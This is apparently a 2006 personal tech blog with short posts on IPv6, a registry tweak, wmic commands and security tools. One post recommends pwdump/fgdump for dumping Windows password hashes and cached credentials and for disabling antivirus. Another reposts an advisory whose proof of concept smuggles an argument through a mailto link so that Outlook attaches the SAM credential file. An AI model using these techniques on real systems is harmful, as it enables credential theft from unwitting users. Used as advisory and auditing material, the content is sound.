Dec 23, 2006

Crash Couse in IPv6

Two articles introducing IPv6.

http://www.windowsnetworking.com/articles_tutorials/Crash-Course-IPv6-Part1.html
http://www.windowsnetworking.com/articles_tutorials/Crash-Course-IPv6-Part2.html

It introduces the IPv6 address space and how it is represented normally and in HTTP URL.
Then it explains the significance of various bits in an IPv6 address; what is site-prefix, subnet-ID and interface-ID; unicast, multicast, and anycast.

Dec 21, 2006

KB Articles QuickSearch

Here's a registry mod that will have you looking up Microsoft
Knowledge Base articles instantly in your browser.

Modify the registry to add the capability to quickly search
the KB articles (formerly referred to as Q articles) in Windows XP
or Windows Server 2003. Here's the procedure:

  1. Run regedit.exe.
  2. Go to HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchUrl.
  3. From the Edit menu, select New, Key and name it KB.
  4. Select the new KB folder that you just created under the SearchUrl folder, and in the right-hand pane double-click Default.
  5. For Value data, enter http://support.microsoft.com/?kbid=%s
  6. Click OK and close the registry editor.

To test this procedure, open Internet Explorer and type KB followed
by the name of the KB article number (for example, to search for
article number 917021, type "kb 917021"). It should take you directly
to the article in your browser.

Make sure that you don't add KB as a key in the SearchUrl folder.
KB should be a subfolder of SearchUrl folder and it should contain
the above entry in the right-hand pane.

I've tested this procedure successfully on Windows XP and Windows
Server 2003 operating systems, and on Internet Explorer and Mozilla
Firefox browsers.

How Skype Works

Interesting read on how skype works trough firewalls.

http://www.heise-security.co.uk/articles/82481/0

Dec 14, 2006

Rule-based Access Control

A very good article in describing Rule-based Access Control, to improve security and make programming easier with an authorization framework.

http://www-128.ibm.com/developerworks/webservices/library/ws-soa-access.html

Dec 11, 2006

Taking pwdump to next level with fgdump

New versions of the ultracool tools pwdump (1.4.2) and fgdump (1.3.4) have been released.

Both versions provide some feature upgrades as well as bug fixes. Folks with really old versions of either program should definitely look at upgrading, since there are numerous performance improvements and full multithreading capabilities in both packages.

If you don’t know..what are pwdump6 and fgdump?

pwdump6 is a password hash dumper for Windows 2000 and later systems. It is capable of dumping LanMan and NTLM hashes as well as password hash histories. It is based on pwdump3e, and should be stable on XP SP2 and 2K3. If you have had LSASS crash on you using older tools, this should fix that.

fgdump is a more powerful version of pwdump6. pwdump tends to hang and such when antivirus is present, so fgdump takes care of that by shutting down and later restarting a number of AV programs. It also can dump cached credentials and protected storage items, and can be run in a multithreaded fashion very easily. I strongly recommend using fgdump over pwdump6, especially given that fgdump uses pwdump6 under the hood! You’ll get everything pwdump6 gives you and a lot more.

Darknet definately DOES recommend fgdump, super cool update of the old favourite pwdump.

fgdump was born out of frustration with current antivirus (AV) vendors who only partially handled execution of programs like pwdump. Certain vendors’ solutions would sometimes allow pwdump to run, sometimes not, and sometimes lock up the box. As such, we as security engineers had to remember to shut off antivirus before running pwdump and similar utilities like cachedump. Needless to say, we’re forgetful sometimes…

So fgdump started as simply a wrapper around things we had to do to make pwdump work effectively. Later, cachedump was added to the mix, as were a couple other variations of AV. Over time it has grown, and continues to grow, to support our assessments and other projects. We are beginning to use it extensively within Windows domains for broad password auditing, and in conjunction with other tools (ownr and pwdumpToMatrix.pl) for discovering implied trust relationships.

fgdump is targetted at the security auditing community, and is designed to be used for good, not evil. :-) Note that, in order to effectively use fgdump, you’re going to need high-power credentials (Administrator or Domain Administrator, in most cases), thus limiting its usefulness as a hacking tool. However, hopefully some of you other security folks will find this helpful.

Get pwdump here


Get fgdump here


Sep 3, 2006

TiddlyWiki

Just come across this today. It is called TiddlyWiki.

TiddlyWiki is a reusable non-linear personal web notebook. It is like a blog because it's divided up into neat little chunks, but it encourages you to read it by hyperlinking rather than sequentially: if you like, a non-linear blog analogue that binds the individual microcontent items into a cohesive whole.

I think that it has represented a novel medium for writing, and will promote its own distinctive writing style in the future.

It is at http://tiddlywiki.com/

May 9, 2006

SANS - Internet Storm Center - Cooperative Cyber Threat Monitor And Alert System

SANS - Windows CMDline Kung-Fu with wmic 

 

To kill a process, like 'kill -9 [pid] and killall-9 cmd.exe'

C:\> wmic process [pid] delete

C:\> wmic process where name='cmd.exe' delete


Like the 'top' command

C:\> wmic process list brief /every:1

 

To simulate 'net user'

 C:\> wmic useraccount

 

To show hotfixes and service packs. [qfe = quick fix enginering]

 C:\> wmic qfe

 

For malware analysis, including all files loaded at startup.

C:\> wmic startup list full

 

Similar to 'ps -aux | grep cmd.exe'.

C:\> wmic process list brief | find "cmd.exe"


Similar to 'man wmic'

C:\> wmic /?:full > wmic_docs_that_stink.txt


Similar to 'ifconfig -a'

C:\> wmic nicconfig where IPEnabled='true'


Similar to ' ifconfig'

C:\> wmic nicconfig where Index=1 call EnableStatic ("10.10.10.10"), ("255.255.255.0")


For DHCP

C:\> wmic nicconfig where Index=1 call EnableDHCP


Others:

c:\> wmic ComputerSystem GET Model
c:\> wmic computersystem get name,systemtype
c:\> wmic bios get serialnumber
c:\> wmic nic get macaddress,description
c:\> wmic csproduct get identifyingnumber
c:\> wmic baseboard get product,Manufacturer,version,serialnumber
c:\> wmic COMPUTERSYSTEM get TotalPhysicalMemory
c:\> wmic process get workingsetsize,commandline
c:\> wmic partition get name,size,type
c:\> wmic COMPUTERSYSTEM GET MANUFACTURER
c:\> wmic csproduct get  version
c:\> wmic service list brief
c:\> wmic process list brief
c:\> wmic startup list brief 
c:\> wmic csproduct get "UUID"  
 



May 3, 2006

Office 2003 file attachment exploit

Found an interesting exploit from here:
Inge Henriksen's Technology Blog

Advisory Name: Multiple browsers Windows mailto protocol Office 2003 file attachment exploit

Tested and Confirmed Vulerable:
Micrsoft Outlook 2003 SP 1
Microsoft Internet Explorer 6 SP2
Mozilla Firefox 1.06
Avant Browser 10.1 Build 17

Severity: Low

Type: Stealing files

From where: Remote

Discovered by:
Inge Henriksen (inge.henriksen@booleansoft.com) http://ingehenriksen.blogspot.com/

Vendor Status: Not notified

Overview:
Application protocols handling in Microsoft Windows is badly designed, i.e. when someone types
mailto:someone@somewhere.com into a browser the protocol is first looked up under
HKEY_CLASSES_ROOT\%protocol%\shell\open\command, if it is a protocol that is allowed under the
current user context then the value is simply replaced by the contents in the address bar at %1. In
our example

"C:\PROGRA~1\MICROS~3\OFFICE11\OUTLOOK.EXE" -c IPM.Note /m "%1"

would become

"C:\PROGRA~1\MICROS~3\OFFICE11\OUTLOOK.EXE" -c IPM.Note /m "mailto:someone@somewhere.com"

There is absolutely no input validation in all the browsers I have tested, i.e. there are exploits
availible by entering more data into the address bar than was intended.

Proof-of Concept:

The mailto application protocol can be axploited by entering "", this will cause
OUTLOOK.EXE to attach the file to the email without asking for permission, thus opening
up for sensitive files to be stolen when a user sends an email it is fair to believe that many
people would not notice the attached file before sending the email.

To attach the SAM file to a email a html file could contain this:

Click here to email me

i.e.:

Click here to email me

The command being run would now be:

"C:\PROGRA~1\MICROS~3\OFFICE11\OUTLOOK.EXE" -c IPM.Note /m "mailto:someone@somewhere.com""..\..\..\..\..\windows\REPAIR\SAM"

, thus attaching the SAM file.